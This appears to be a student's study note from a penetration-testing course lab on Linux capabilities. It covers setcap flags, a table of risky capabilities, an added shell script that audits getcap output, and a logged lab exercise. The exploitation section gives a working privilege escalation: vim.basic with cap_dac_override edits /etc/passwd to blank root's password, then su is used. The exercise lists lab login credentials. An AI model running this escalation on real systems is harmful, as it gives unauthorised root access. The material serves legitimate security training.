# Intro
- Linux capabilities are a security feature of the Linux kernel that splits the all-or-nothing power of `root` into distinct privileges that can be granted to individual processes, letting them perform specific actions that would otherwise be restricted
- This gives fine-grained control over which processes hold which privileges, which is more secure than the traditional Unix model of handing a process the full privileges of a user or group
# Set Capability
- Setting capabilities involves using the appropriate tools and commands to assign specific capabilities to executables or programs
- In Ubuntu, for example, we can use the `setcap` command to set capabilities for specific executables
- This command lets us name the capability we want to set and the flag value we want to assign to it
- Below are some examples of values that we can use with the `setcap` command, along with a brief description of what they do
|**Capability Values**|**Description**|
|---|---|
|`=`|Assigns the specified capability to the executable with no flags set, so it grants no privileges. This is useful for clearing a previously set capability on the executable.|
|`+ep`|Grants the effective and permitted flags for the specified capability to the executable. The executable can perform the actions that the capability allows, and nothing beyond them.|
|`+ei`|Grants the effective and inheritable flags for the specified capability to the executable. The executable can perform the actions that the capability allows, and child processes spawned by the executable can inherit the capability and perform the same actions.|
|`+p`|Grants only the permitted flag for the specified capability to the executable. The executable may raise the capability into its effective set itself, but it does not start with the capability active, and child processes do not inherit it. This is useful if we want to make the capability available to the executable while preventing it from being passed on.|
# Example with `cap_net_bind_service`
- For example, we could use the following command to set the `cap_net_bind_service` capability for an executable:
```bash
sudo setcap cap_net_bind_service=+ep /usr/bin/vim.basic
```
- When capabilities are set on a binary, the binary is able to perform specific actions that it could not perform without them
- In this example, once the `cap_net_bind_service` capability is set on a binary, that binary can bind to privileged network ports (those below 1024), which is normally restricted to `root`
- Some capabilities, such as `cap_sys_admin`, let an executable perform actions with administrative privileges and can be dangerous if they are not used carefully
- Below are some common capabilities:
|**Capability**|**Description**|
|---|---|
|`cap_sys_admin`|Allows a process to perform actions with administrative privileges, such as modifying system files or changing system settings.|
|`cap_sys_chroot`|Allows a process to change its root directory, potentially giving it access to files and directories that would otherwise be inaccessible.|
|`cap_sys_ptrace`|Allows a process to attach to and debug other processes, potentially giving it access to sensitive information or letting it modify the behavior of other processes.|
|`cap_sys_nice`|Allows a process to raise or lower the priority of processes, potentially giving it access to resources that would otherwise be restricted.|
|`cap_sys_time`|Allows a process to modify the system clock, potentially letting it manipulate timestamps or cause other processes to behave in unexpected ways.|
|`cap_sys_resource`|Allows a process to modify system resource limits, such as the maximum number of open file descriptors or the maximum amount of memory that can be allocated.|
|`cap_sys_module`|Allows a process to load and unload kernel modules, potentially letting it modify the operating system's behavior or gain access to sensitive information.|
|`cap_net_bind_service`|Allows a process to bind to privileged network ports, potentially letting it impersonate a privileged service or perform unauthorized actions.|
## Capabilities for Privesc
- Several Linux capabilities can be used to escalate a user's privileges to `root`, including:
|**Capability**|**Description**|
|---|---|
|`cap_setuid`|Allows a process to set its effective user ID, which can be used to gain the privileges of another user, including the `root` user.|
|`cap_setgid`|Allows a process to set its effective group ID, which can be used to gain the privileges of another group, including the `root` group.|
|`cap_sys_admin`|This capability provides a broad range of administrative privileges, including the ability to perform many actions reserved for the `root` user, such as modifying system settings and mounting and unmounting file systems.|
|`cap_dac_override`|Allows bypassing of file read, write, and execute permission checks.|
# Capabilities Enum
- Capabilities should be used with caution and only granted to trusted processes, as they can be misused to gain unauthorized access to the system.
- To enumerate all existing capabilities for all existing binary executables on a Linux system, we can use the following command:
```bash
find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;
```
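As an added example (not part of the original note), a small POSIX sh audit that parses `getcap` output, handles both the newer `path cap=flags` and the older `path = cap+flags` output formats, and reports only binaries that hold one of the privesc-table capabilities in their permitted or effective set (inheritable-only entries are skipped). The sample lines are constructed, and the `audit_caps_system` helper name is my own.

```shell
#!/bin/sh
# Added audit helper (not from the original note): flag binaries whose
# capability set includes a root-escalation capability from the table above.
set -e

# Capabilities the note lists as usable to escalate to root.
DANGEROUS="cap_setuid cap_setgid cap_sys_admin cap_dac_override"

# Constructed sample covering both getcap output styles:
#   newer libcap:  path cap_a,cap_b=flags
#   older libcap:  path = cap_a,cap_b+flags
SAMPLE='/usr/bin/ping cap_net_raw=ep
/usr/bin/vim.basic cap_dac_override=eip
/usr/bin/python3 = cap_setuid+ep
/usr/bin/perl cap_setuid,cap_setgid=i
/usr/bin/tar = cap_dac_read_search+ep'

# Reads getcap lines on stdin; prints "path capability flags" per finding.
audit_caps() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        path=${line%% *}        # first field is the binary path
        rest=${line#* }
        rest=${rest#= }         # drop the "= " of the older format
        for group in $rest; do  # e.g. cap_setuid,cap_setgid=ep
            case $group in
                *=*) caps=${group%%=*}; flags=${group#*=} ;;
                *+*) caps=${group%%+*}; flags=${group#*+} ;;
                *)   continue ;;
            esac
            for cap in $(printf '%s' "$caps" | tr ',' ' '); do
                case " $DANGEROUS " in
                    *" $cap "*)
                        # Only permitted (p) or effective (e) is exploitable here;
                        # an inheritable-only (i) capability is not gained on exec.
                        case $flags in
                            *e*|*p*) printf '%s %s %s\n' "$path" "$cap" "$flags" ;;
                        esac ;;
                esac
            done
        done
    done
}

# Offline run against the constructed sample.
audit_caps_sample() { printf '%s\n' "$SAMPLE" | audit_caps; }

# Live run using the same find/getcap enumeration as in the note.
audit_caps_system() {
    find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \; 2>/dev/null | audit_caps
}

audit_caps_sample
```

Replace `audit_caps_sample` with `audit_caps_system` on a real host; each reported line is a binary worth reviewing with `getcap` and, if unneeded, clearing with `setcap`.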
# Capabilities Exploitation
- For example, assume we gained access to a system with a low-privilege account and then discovered the `cap_dac_override` capability on a target binary with the following enumeration command:
```bash
getcap /usr/bin/vim.basic
/usr/bin/vim.basic cap_dac_override=eip
```
- In this example, the `/usr/bin/vim.basic` binary is run without any special privileges such as `sudo`
- However, because the binary has the `cap_dac_override` capability set, it effectively escalates the privileges of the user who runs it
- This lets a pentester act with the `cap_dac_override` capability and perform tasks that require it
- With this in mind, let's take a look at the `/etc/passwd` file where the user `root` is specified
```bash
cat /etc/passwd | head -n1
root:x:0:0:root:/root:/bin/bash
```
- Next, let's use the `cap_dac_override` capability of the `/usr/bin/vim.basic` binary to modify a system file such as `/etc/passwd` non-interactively
```bash
echo -e ':%s/^root:[^:]*:/root::/\nwq!' | /usr/bin/vim.basic -es /etc/passwd
cat /etc/passwd | head -n1
root::0:0:root:/root:/bin/bash
```
- Now the `x` is gone, which means we can use the `su` command to log in as `root` without being asked for a password
---
# Exercise
- `ping` test ![[images/Pasted image 20260204203125.png]]
- `nmap` scans ![[images/Pasted image 20260204203232.png]]
- `ssh` into box with given creds `htb-student:HTB_@cademy_stdnt!`
- light enum on box ![[images/Pasted image 20260204203241.png]]
- enum caps ![[images/Pasted image 20260204203337.png]]
- confirm against `vim.basic` with `getcap` ![[images/Pasted image 20260204203430.png]]
- review `/etc/passwd` ![[images/Pasted image 20260204203454.png]]
- modify `/etc/passwd` with the cap associated with `vim.basic` and confirm modification ![[images/Pasted image 20260204203601.png]]
- use `su` command without password and navigate to flag ![[images/Pasted image 20260204203650.png]]